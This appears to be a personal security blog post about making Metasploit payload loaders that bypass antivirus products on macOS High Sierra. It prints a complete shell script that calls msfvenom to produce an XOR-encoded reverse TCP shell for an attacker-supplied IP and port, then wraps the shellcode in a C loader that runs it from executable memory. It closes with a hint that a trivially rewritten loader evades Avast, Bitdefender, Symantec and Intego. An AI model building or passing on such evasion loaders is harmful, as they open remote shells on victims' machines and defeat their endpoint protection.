Decided to upgrade the MacOS in my VirtualBox to High Sierra and do some testing using customized Metasploit payload loaders there.

Installed the https://www.avast.com/free-mac-security and tested the generators from last year (I was not expecting the results to bypass this AV actually :)) and as expected, the bypass from last year gets picked up now. ( https://astr0baby.wordpress.com/2017/07/13/bypassing-antivirus-on-osx-10-11-with-metasploit-avast/)

What is super-cool nowadays on MacOS is that when you run gcc in the terminal it will automatically prompt you to install the Xcode stuff from Apple, so this time I have used the following

So I went up to build my loaders and all the payloads no matter what get flagged now by Avast

And I started to wonder why …

My original code looked like this ->

clear echo "************************************************************" echo " Automatic shellcode generator - FOR METASPLOIT " echo " For OSX 64bit Antivirus bypass (Avast) " echo "************************************************************" echo -e "What IP are we gonna use ? \c" read IP echo -e "What Port Number are we gonna listen to? : \c" read port echo '[*] Checking if metasploit msfvenom is present..' if [ -x ./msfvenom ]; then echo '[*] Found msfvenom in current path ........ good' else echo '[-] No msfvenom in path...make sure you have this script in your metasploit-framework path' exit 0 fi echo '[*] Cleaning up ' rm -f osx64-payload.c ./msfvenom -p osx/x64/dupandexecve/reverse_tcp EXITFUNC=process LHOST=$IP LPORT=$port -a x64 --platform OSX -e x64/xor -f c -o test.c echo "#include <stdio.h>" > temp.c echo '#include <sys/types.h>' >> temp.c echo '#include <sys/ipc.h>' >> temp.c echo '#include <sys/msg.h>' >> temp.c echo '#include <string.h>' >> temp.c echo '#include <sys/mman.h>' >> temp.c echo '#include <fcntl.h>' >> temp.c echo '#include <sys/socket.h>' >> temp.c echo '#include <stdlib.h>' >> temp.c echo '#include <errno.h>' >> temp.c echo '#include <sys/mman.h>' >> temp.c echo '#include <sys/types.h>' >> temp.c echo '#include <sys/stat.h>' >> temp.c echo '#include <sys/ioctl.h>' >> temp.c echo '#include <unistd.h>' >> temp.c echo '#include <strings.h>' >> temp.c echo '#include <unistd.h>' >> temp.c echo '#include <poll.h>' >> temp.c echo '#include <pthread.h>' >> temp.c echo '#include <stdint.h>' >> temp.c echo '' >> temp.c cat test.c >> temp.c echo '' >> temp.c echo 'int main(int argc, char **argv)' >> temp.c echo '{' >> temp.c echo 'void *ptr = mmap(0, 0x1000, PROT_WRITE|PROT_READ|PROT_EXEC, MAP_ANON | MAP_PRIVATE, -1, 0);' >> temp.c echo 'printf("ret: 0x%x",ptr);' >> temp.c echo 'memcpy(ptr,buf,sizeof buf);' >> temp.c echo 'void (*fp)() = (void (*)())ptr;' >> temp.c echo 'fp();' >> temp.c echo '' >> temp.c echo '}' >> temp.c mv temp.c osx64-payload.c if [ -f ./osx64-payload.c ]; then echo '[*] osx64-payoad.c generated ...' ls -la osx64-payload.c else echo '[-] Something went wrong .. ' exit 0 fi

And once I have put the generated (On Linux) source code to the MacOS and compiled it via gcc it got flagged immediately.

Whats interesting is that no matter what is in the unsigned char/signed char stuff it gets flagged anyway as you can see in the screenshot here

So Avast seems to be tagging only the int main part obviously, as it does not even try do see what the shellcode does …. any bogus stuff can be there … so now comes a 5 cent question … how hard is it to re-write the loader ? :)

Hint .. about 5 seconds ?

Same goes for Bitdefender for MacOS

And Symantec AV

And Intego Mac Internet Security X9

